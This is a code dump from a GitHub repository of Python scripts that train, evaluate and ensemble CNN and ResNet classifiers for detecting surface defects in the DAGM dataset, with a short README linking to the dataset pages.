"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport time\nimport glob\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport numpy as np\nimport tensorflow as tf\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\nsys.path.append(\"../../ML_utils\") # parent directory\nimport JK_image\n\n\nimport jknet1\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#sys.path.append(\"networks\") # parent directory\n\n\ndef detectDefectViaVisdom( args, result_type=1, isResultSave=True):\n \n # images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n blockW = args.feature_shape[0]\n blockH = args.feature_shape[1]\n blockC = args.feature_shape[2]\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n \n model_dir = \"models_tensorflow/\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir) \n checkpoint_dir = model_dir + args.load_folder_file[0]\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n# latest_filename = \"checkpoint_state\"\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n\n saved_graph_file = checkpoint_dir + args.load_folder_file[1] + '.meta'\n saver = tf.train.import_meta_graph(saved_graph_file)\n \n checkpoint = tf.train.get_checkpoint_state(checkpoint_dir, latest_filename=\"checkpoint_state\") \n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Loaded checkpoints %s\" % checkpoint.model_checkpoint_path)\n elif False:\n raise Exception(\"Could not load checkpoints for playback\")\n\n result_images = []\n for imgNo in range(nImages):\n \n# plt.imshow(images[imgNo], cmap='gray')\n# plt.show() \n \n Xs = []\n tempX = images[imgNo]/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs.append(tempX[i:i+blockW, j:j+blockH])\n \n \n Xs = np.array(Xs, dtype=np.float32).reshape([-1, blockW * blockH * blockC])\n \n graph = tf.get_default_graph()\n training = graph.get_tensor_by_name(\"DAGM/training:0\")\n input = graph.get_tensor_by_name(\"DAGM/input:0\")\n# result_prob = graph.get_tensor_by_name(\"prob:0\") \n# Ys_prob = sess.run(result_prob, feed_dict={input:Xs, training:False})\n result = graph.get_tensor_by_name(\"result:0\") \n Ys = sess.run(result, feed_dict={ input:Xs, training:False}) \n \n# Ys[np.where(Ys>=6)] = 1.0\n# Ys[np.where(Ys>=6)] = 1.0\n# Ys = Ys.reshape([16,16]).T\n# \n# result_image = np.full([16, 16], 0) \n result_image = np.zeros([16,16]) \n for i in range(16):\n for j in range(16):\n classNo = Ys[j+i*16] \n if classNo>=6:\n result_image[j,i] = 1\n \n result_image = cv2.resize(result_image, (512,512), interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n result_images.append(result_image)\n 
\n# plt.imshow(result_image, cmap='gray')\n# plt.show() \n \n images = np.array(images, dtype=\"float\") \n result_images = np.array(result_images, dtype=\"float\") \n# print(result_images.shape)\n# plt.imshow(result_images[0], cmap='gray')\n images = images.reshape([-1,1,512,512]) \n result_images = result_images.reshape([-1,1,512,512])\n\n \n vis = visdom.Visdom() \n \n if result_type==1:\n for i in range(nImages):\n vis.image(result_images[i])\n \n elif result_type==1:\n# results_tensor = torch.cat((X_tensor, Y_tensor), 0) \n results = np.concatenate((images, result_images), axis=0) \n vis.images(images, nrow=6)\n vis.images(result_images, nrow=6)\n vis.images(results, nrow=6) \n \n # kk = out_images.numpy().reshape(-1,512,512)\n # heat = np.hstack([kk[0], kk[1]]).reshape([512,2*512]) \n # vis.heatmap(heat)\n\n elif result_type==2:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n for i in range(nImages): \n inputImg = inputImages_np[i] \n tempInput = JK_image.GRAY2CRGB(inputImg)\n tempInput = cv2.cvtColor(inputImg, cv2.COLOR_GRAY2BGR)\n tempInput = JK_image.HWC3toC3HW(tempInput)\n \n outputImg = outputImages_np[i]\n tempOutput = cv2.cvtColor(outputImg, cv2.COLOR_GRAY2BGR)\n tempOutput = JK_image.HWC3toC3HW(tempOutput)\n tempHeatmap = JK_image.GRAY2HeatMap(outputImg)\n \n tempInput = np.array(tempInput).reshape(-1, 3, height, width)\n tempOutput = np.array(tempOutput).reshape(-1, 3, height, width)\n tempHeatmap = np.array(tempHeatmap).reshape(-1, 3, height, width)\n \n result = np.concatenate((tempInput, tempOutput), axis=0)\n result = np.concatenate((result, tempHeatmap), axis=0)\n vis.images(result, nrow=6)\n \n \n elif result_type==3:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n# inputImages = []\n# outputImages = []\n# heatmapImages = []\n resultImages = []\n for i in range(nImages): \n \n inputImg = JK_image.HWC3toC3HW( cv2.cvtColor(inputImages_np[i], cv2.COLOR_GRAY2RGB) )\n outputGray = JK_image.HWC3toC3HW( cv2.cvtColor(outputImages_np[i] , cv2.COLOR_GRAY2RGB) )\n outputHeat = JK_image.GRAY2HeatMap(outputImages_np[i] )\n \n resultImg = np.concatenate((inputImg, outputGray), axis=0)\n resultImg = np.concatenate((resultImg, outputHeat), axis=0) \n resultImages.append(resultImg)\n \n# inputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(inputImg, cv2.COLOR_GRAY2RGB) ) )\n# outputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(outputImg, cv2.COLOR_GRAY2RGB) ) )\n# heatmapImages.append( util_image.GRAY2HeatMap(outputImg) )\n \n# inputImages = np.array(inputImages).reshape(-1, 3, height, width)\n# outputImages = np.array(outputImages).reshape(-1, 3, height, width)\n# heatmapImages = np.array(heatmapImages).reshape(-1, 3, height, width) \n# results = np.concatenate((inputImages, outputImages), axis=0)\n# results = np.concatenate((results, heatmapImages), axis=0)\n# vis.images(results, nrow=6)\n\n resultImages = np.array(resultImages).reshape(-1, 3, height, width) \n vis.images(resultImages, nrow=3)\n \n# print(\"Input size :\", X_tensor.size())\n# print(\"Output size :\", Y_tensor.size())\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n \n # GPU check\n\n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 
'load_folder_file': (\"DAGM_jknet1_32/\",'saved_checkpoint-0'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"../DataForEvaluation\",\n 'feature_shape' : (32,32,1),\n })\n \n detectDefectViaVisdom(args, result_type=1) \n \n \n "
},
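Both evaluation scripts push their result grids to a running Visdom server with vis.images, which expects arrays shaped (N, C, H, W) and tiles them nrow per row. A minimal usage sketch with random stand-in data; it assumes a server started with `python -m visdom.server` is listening on the default localhost:8097:

import numpy as np
import visdom

vis = visdom.Visdom()          # connects to http://localhost:8097 by default

# six fake single-channel 512x512 result maps, laid out three per row
result_images = np.random.rand(6, 1, 512, 512)
vis.images(result_images, nrow=3)

# a single window per image works the same way with vis.image
vis.image(result_images[0])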
{
"alpha_fraction": 0.589595377445221,
"alphanum_fraction": 0.6127167344093323,
"avg_line_length": 24.121952056884766,
"blob_id": "972b36e967f09a16783c541354195651e10f29e8",
"content_id": "ee05ff480afd1c974137dbe6a9a4b56a712ba5c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1038,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 41,
"path": "/DAGM/JK_data.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nUTIL for image processing\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport glob\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\nclass Data(object):\n def __init__(self):\n self.Xs = np.zeros(1)\n self.Ys = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.Xs), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.Xs[mini_batch], self.Ys[mini_batch]\n "
},
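A short usage sketch for the Data container above; the arrays are placeholders, and only the attribute names and the next_batch signature come from the class itself:

    import numpy as np
    from JK_data import Data

    data = Data()
    data.Xs = np.random.rand(100, 512, 512)  # hypothetical image stack
    data.Ys = np.random.randint(0, 2, 100)   # hypothetical labels
    data.num_examples = len(data.Xs)

    xb, yb = data.next_batch(8)              # 8 distinct random samples
    print(xb.shape, yb.shape)                # (8, 512, 512) (8,)

Because next_batch draws fresh indices on every call, samples are distinct within a batch but batches can overlap across an epoch; the commented-out block in the class is the sequential alternative.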
{
"alpha_fraction": 0.48696616291999817,
"alphanum_fraction": 0.504645049571991,
"avg_line_length": 34.68316650390625,
"blob_id": "4d1a043adab81626d303279e1c94b9142269ac0c",
"content_id": "33825a3f8da8d801e52dfac0e16129baeb9dadd8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14440,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 404,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_model_accuracy_test.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n#import tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n\n\nsys.path.insert(0, 'networks')\n\n\nfrom resnetJK0 import resnet34v1 as Network\n#from cnn0 import Conv12k8 as Network\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#import glob\n#import random\n\n# torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True) \n# torch.nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1)\n \ndef weights_init(m):\n classname = m.__class__.__name__\n# print(classname) \n if classname.find('Linear') != -1:\n nn.init.xavier_uniform(m.weight)\n# m.weight.data.normal_(0.0, 0.02)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n \n elif classname.find('Conv') != -1:\n nn.init.xavier_uniform(m.weight)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n# m.weight.data.normal_(0.0, 0.1)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.1)\n m.bias.data.fill_(0)\n\nclass Commander :\n \n def __init__(self, args, data):\n \n self.args = args\n self.data = data\n \n self.featureC = self.args.feature_shape[0]\n self.featureH = self.args.feature_shape[1] \n self.featureW = self.args.feature_shape[2]\n \n self.modelFilePath = \"models/\"\n# self.modelFilePath = self.modelFilePath + self.args.load_folder_file[1] + \"/\"\n# if not os.path.exists(self.modelFilePath):\n# os.mkdir(self.modelFilePath) \n \n \n self.resultFolderPath = \"results/\"\n if not os.path.exists(self.resultFolderPath):\n os.mkdir(self.resultFolderPath) \n \n \n self.Sigmoid = nn.Sigmoid()\n self.softmax = nn.Softmax() \n\n \n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \n note = Element(\"TrainingInformation\")\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\n SubElement(note, \"BatchSize\").text = str(batchSize) \n SubElement(note, \"MinCost\").text = str(minCost)\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\n SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + \"training_imformation.xml\")\n \n def createModelInformationXML(self): \n note = Element(\"ModelSetting\")\n to = Element(\"ModelName\")\n to.text = self._graphName \n note.append(to)\n# SubElement(note, \"FeatureWidth\").text = str(self._featureShape[0])\n# SubElement(note, 
\"FeatureHeight\").text = str(self._featureShape[1]) \n# SubElement(note, \"LabelSize\").text = str(self._label_size)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + self._graphName + \".xml\")\n# \n \n def loadModel(self, path):\n \n network = 0\n \n try: \n network = torch.load(path, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n# print(\"--------\" + path + \" is restored--------\")\n \n except:\n print(\"--------There are no models.--------\") \n pass\n \n \n if self.args.isGPU:\n network.cuda()\n else :\n network.cpu()\n \n return network\n \n \n def getCurrentAccuracy(self, net, batch_size, isTrainData=False):\n \n net.eval()\n \n channel = self.args.feature_shape[0]\n height = self.args.feature_shape[1]\n width = self.args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = dataset.images \n Ynp = dataset.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n Ys_var = Ys_var.cuda()\n \n output_var = net(Xs_var)\n output_var = self.softmax(output_var)\n \n _, prediction = torch.max(output_var,1)\n \n# for k in range(batch_size):\n# plt.imshow(Xnp[k], cmap='gray')\n# plt.show()\n# plt.imsave( 'a.png', Xnp[k], cmap='gray')\n# print(prediction)\n \n accuracy = (prediction==Ys_var).double().sum()/output_var.size()[0] \n# print(accuracy)\n if self.args.isGPU:\n accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n \n\n return avg_accuracy\n \n \n \n def getEachModelAccuracy(self, modelList, isTrainData=False):\n \n \n for model in modelList:\n print('|========================================================|')\n# print( model)\n modelPath = self.modelFilePath + model[0] + \"/\"\n# print(modelPath)\n modelFilePath = modelPath + model[1] + '_all.pkl' \n# print(modelFilePath)\n net = self.loadModel(modelFilePath)\n \n accuracy = self.getCurrentAccuracy( net, batch_size=self.args.batch_size, isTrainData=isTrainData)\n \n \n # print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n print(\"|=====\", modelFilePath, \"=====|\")\n print(\"|===== Accuracy : %.1f\" % (accuracy*100.), \"% ===========|\")\n print('|========================================================|')\n\n return 0\n \n\n \n def getEnsembleAccuracy(self, model_list, Xs_var):\n ensemble_result = bool\n iterNo = 0\n for model in model_list:\n \n modelPath = self.modelFilePath + model[0] + \"/\"\n modelFilePath = modelPath + model[1] + \"_all.pkl\"\n net = self.loadModel(modelFilePath)\n net.eval() \n output_var = net(Xs_var)\n output_var = self.softmax(output_var)\n \n if self.args.isGPU:\n output_var = output_var.cpu()\n \n if iterNo>0:\n ensemble_result += output_var\n else:\n ensemble_result = output_var\n \n iterNo += 1\n \n ensemble_result = ensemble_result/len(model)\n \n return ensemble_result\n \n \n def 
getEnsembleAccuracyForTest(self, model_list, batch_size, isTrainData=False):\n \n channel = self.args.feature_shape[0]\n height = self.args.feature_shape[1]\n width = self.args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = dataset.images \n Ynp = dataset.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n \n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n# Ys_var = Ys_var.cuda()\n \n \n ensemble_result = self.getEnsembleAccuracy( model_list, Xs_var)\n \n \n if self.args.isGPU:\n ensemble_result = ensemble_result.cpu()\n \n _, prediction = torch.max(ensemble_result, 1)\n accuracy = (prediction==Ys_var).double().sum()/ensemble_result.size()[0] \n \n# if self.args.isGPU:\n# accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n print('|========================================================|')\n print('|========================================================|')\n print(\"|===== Ensemble accuracy : %.1f\" % (avg_accuracy*100.), \"% =====|\")\n print('|========================================================|')\n print('|========================================================|')\n \n return avg_accuracy\n \n\nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\n 'isGPU' : True, # False, # True, \n 'load_folder_file': [(\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet34v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n (\"DAGM2_resnetJK0_resnet50v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet101v1_32_12\",'recent'),\n (\"DAGM2_resnetJK0_resnet152v1_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k4_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k8_32_12\",'recent')],\n 'featureType' : 'block', # block \\ full\n 'label_format' : 2,\n 'classNoList' : [1,2,3,4,5,6],\n 'feature_shape' : [1, 32, 32], # channel, H, W \n 'label_size' : 12, # index 0 : something we don't know \n 'batch_size' : 256, \n }) \n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n import dagmCV2 as DAGM\n\n# dagm = DAGM.DAGM(args.dataPath) 
\n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format) \n commander = Commander( args=args, data=dagm) \n commander.data.getBlockImages(blockH=args.feature_shape[1], blockW=args.feature_shape[2], \n nOKperClass=200, nNGperClass=200, classNoList=args.classNoList, \n label_type='index', isTrain=False)\n \n commander.getEachModelAccuracy(modelList=args.load_folder_file, isTrainData=False)\n \n commander.getEnsembleAccuracyForTest(model_list=args.load_folder_file, \n batch_size=args.batch_size, isTrainData=False)\n \n# if args.isGPU:\n# accuracy_test = accuracy_test.cpu()\n \n# print('=====================================================================') \n## print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n# print(\"Accuracy for test-data : %.1f\" % (accuracy_test*100.), \"%\")\n# print('=====================================================================') \n\n "
},
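The soft-voting scheme in getEnsembleAccuracy reduces to averaging per-class probabilities across models and taking the argmax. A minimal numpy sketch of just that step, with random arrays standing in for the softmax outputs of the loaded networks:

    import numpy as np

    # 3 models, each producing (4 samples x 12 classes) probabilities
    probs_per_model = [np.random.dirichlet(np.ones(12), size=4) for _ in range(3)]
    ensemble = np.mean(np.stack(probs_per_model), axis=0)  # (4, 12) averaged probabilities
    prediction = ensemble.argmax(axis=1)                   # class index per sample
    print(prediction)

Averaging probabilities instead of hard votes lets one confident model outweigh several uncertain ones, which is why the method accumulates softmax outputs before calling torch.max.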
{
"alpha_fraction": 0.6767676472663879,
"alphanum_fraction": 0.7171717286109924,
"avg_line_length": 27.285715103149414,
"blob_id": "e7ddad42c603e3bdc0cd2d81d7ac0ae0a0f7cda9",
"content_id": "c151cd627eba6fcad5753c8e5221d1698ea137f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 198,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 7,
"path": "/README.md",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# Defect-Inspection-for-DAGM\n\n## Data-set \n##### First version\n* https://resources.mpi-inf.mpg.de/conference/dagm/2007/prizes.html\n##### Second version\n* https://hci.iwr.uni-heidelberg.de/node/3616\n"
},
{
"alpha_fraction": 0.487930566072464,
"alphanum_fraction": 0.501582145690918,
"avg_line_length": 41.44529724121094,
"blob_id": "684bb5508fdc73a4aa5839e496597719346fc817",
"content_id": "28f349a9145be42b1c97dc4e4b054b42681e46e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22138,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 521,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_cnn_train.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n#import tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n\n\nsys.path.insert(0, 'networks')\n\n\nfrom resnetJK0 import resnet18v1 as Network\n#from cnn0 import Conv12k8 as Network\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#import glob\n#import random\n\n# torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True) \n# torch.nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1)\n \ndef weights_init(m):\n classname = m.__class__.__name__\n# print(classname) \n if classname.find('Linear') != -1:\n nn.init.xavier_uniform(m.weight)\n# m.weight.data.normal_(0.0, 0.02)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n \n elif classname.find('Conv') != -1:\n nn.init.xavier_uniform(m.weight)\n m.bias.data.normal_(0.0, 0.1)\n print(\"xavier_uniform\")\n# m.weight.data.normal_(0.0, 0.1)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.1)\n m.bias.data.fill_(0)\n\nclass Commander :\n \n def __init__(self, args, data):\n \n self.args = args\n self.data = data\n \n self.featureC = self.args.feature_shape[0]\n self.featureH = self.args.feature_shape[1] \n self.featureW = self.args.feature_shape[2]\n \n self.modelFilePath = \"models/\"\n if not os.path.exists(self.modelFilePath):\n os.mkdir(self.modelFilePath) \n self.modelFilePath = self.modelFilePath + self.args.load_folder_file[0] + \"/\"\n if not os.path.exists(self.modelFilePath):\n os.mkdir(self.modelFilePath) \n# self.modelFilePath = self.modelFilePath + self.args.load_folder_file[1] + \"/\"\n# if not os.path.exists(self.modelFilePath):\n# os.mkdir(self.modelFilePath) \n \n \n self.resultFolderPath = \"results/\"\n if not os.path.exists(self.resultFolderPath):\n os.mkdir(self.resultFolderPath) \n \n \n \n self.network = Network(self.args.feature_shape, self.args.label_size) \n# self.network.apply(weights_init) \n \n self.optimalModelPath = self.modelFilePath + self.args.optimalModelName + '_all.pkl'\n self.optimalParamsPath = self.modelFilePath + self.args.optimalModelName + '_params.pkl'\n self.backupModelPath = self.modelFilePath + 'recent_all.pkl'\n self.backupParamsPath = self.modelFilePath + 'recent_params.pkl' \n self.saveModelPath = self.modelFilePath + self.args.save_folder_file[1] + '_all.pkl'\n self.saveParamsPath = self.modelFilePath + self.args.save_folder_file[1] + 
'_params.pkl' \n self.loadModelPath = self.modelFilePath + self.args.load_folder_file[1] + '_all.pkl'\n self.loadParamsPath = self.modelFilePath + self.args.load_folder_file[1] + '_params.pkl' \n print(\"Model path :\", self.loadModelPath)\n \n if self.args.load_model: \n try: \n self.network = torch.load(self.loadModelPath, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n print(\"\\n--------\" + self.args.load_folder_file[1] + \" is restored--------\\n\")\n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n print(\"\\n--------First learning.--------\\n\")\n pass\n else: \n print(\"\\n--------First learning.--------\\n\")\n \n \n if self.args.isGPU:\n self.network.cuda()\n else :\n self.network.cpu()\n \n self.Sigmoid = nn.Sigmoid()\n self.Relu = nn.ReLU()\n self.softmax = nn.Softmax() \n self.optimizer = torch.optim.Adam(self.network.parameters(), lr=self.args.learning_rate, weight_decay=1e-5)\n# self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=self.args.learning_rate, momentum=0.9, weight_decay=1e-5)\n# self.optimizer = torch.optim.SGD(self.network.parameters(), lr=self.args.learning_rate, momentum=0.9, weight_decay=1e-5)\n\n\n# self.loss_func = nn.MSELoss() \n self.loss_func = nn.CrossEntropyLoss()\n# self.loss_func = nn.BCELoss(size_average=False)\n \n \n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \n note = Element(\"TrainingInformation\")\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\n SubElement(note, \"BatchSize\").text = str(batchSize) \n SubElement(note, \"MinCost\").text = str(minCost)\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\n SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + \"training_imformation.xml\")\n \n def createModelInformationXML(self): \n note = Element(\"ModelSetting\")\n to = Element(\"ModelName\")\n to.text = self._graphName \n note.append(to)\n# SubElement(note, \"FeatureWidth\").text = str(self._featureShape[0])\n# SubElement(note, \"FeatureHeight\").text = str(self._featureShape[1]) \n# SubElement(note, \"LabelSize\").text = str(self._label_size)\n# dump(음표) \n# ElementTree(음표).write(self.model_dir + self._graphName + \".xml\")\n# \n \n def train(self, nReDataGeneration=1, nTrainingEpochs=20, batch_size=100):\n 